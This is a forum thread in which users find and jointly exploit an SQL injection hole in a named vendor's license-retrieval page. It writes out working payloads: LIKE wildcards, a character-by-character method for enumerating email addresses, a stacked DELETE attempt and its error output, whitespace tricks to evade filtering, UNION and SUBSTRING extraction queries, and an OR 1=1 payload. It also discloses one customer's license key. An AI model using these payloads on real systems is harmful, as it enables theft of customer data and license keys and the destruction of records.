Easily hacked...
-
http://fixtunes.com/purchasecode.php
You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.
As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!
-
That's horrible. I also don't like the idea that someone can pull up my product key just by knowing my email address.
-
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
-
Presumably you could extract email addresses from this.
Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.
-
@joe.edwards@imaginuity.com said:
Presumably you could extract email addresses from this.
Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.
plz send codez
-
@skippy said:
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
-
@medialint said:
@skippy said:
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I suppose the wildcards are there so you can work around the character length restriction.
-
Bad query:
- Error #: 1064
- Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
- Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
They do seem to remove all spaces from your input.... Anyone know how to get around that?
-
@MasterPlanSoftware said:
Bad query:
- Error #: 1064
- Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
- Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
They do seem to remove all spaces from your input.... Anyone know how to get around that?
Use a different kind of whitespace? Like a tab character.
That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.
-
@joe.edwards@imaginuity.com said:
Use a different kind of whitespace? Like a tab character.
Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.
-
@MasterPlanSoftware said:
@joe.edwards@imaginuity.com said:
Use a different kind of whitespace? Like a tab character.
Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.
The tab character works, but it'll only run a single query.
-
abc' union select Email from d_Purchases where Email like 'a%
-
Interesting...
Purchase Code: afes-sler-@c
-
Good to know that Mr. Fessler's code is AAA5-4E26-K9
-
So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.
-
@joe.edwards@imaginuity.com said:
abc' union select Email from d_Purchases where Email like 'a%
And then:
abc' union select SUBSTRING(Email FROM 9) from d_Purchases where Email like 'a%
-
@MasterPlanSoftware said:
They do seem to remove all spaces from your input.... Anyone know how to get around that?
- %20?
- Don't bother?
- Alt-0160?
In a random order. I suggest #2.
-
@PJH said:
@MasterPlanSoftware said:
They do seem to remove all spaces from your input.... Anyone know how to get around that?
- %20?
- Don't bother?
- Alt-0160?
In a random order. I suggest #2.
Yeah, already solved. Thanks for your helpfulness...
-
@medialint said:
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database. Some people's e-mail address is way too long.
-
@Heron said:
@medialint said:
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database. Some people's e-mail address is way too long.
Is there any actual limit on email address lengths?
-
The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maxiumum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.
-
So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D
There's a similar hole on the LimeWire Pro site as well... :)
-
They appear to have fixed it. I now get "Error" when I put in %.
-
@Jonathan Holland said:
They appear to have fixed it. I now get "Error" when I put in %.
Hurray for your efforts!
-
It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.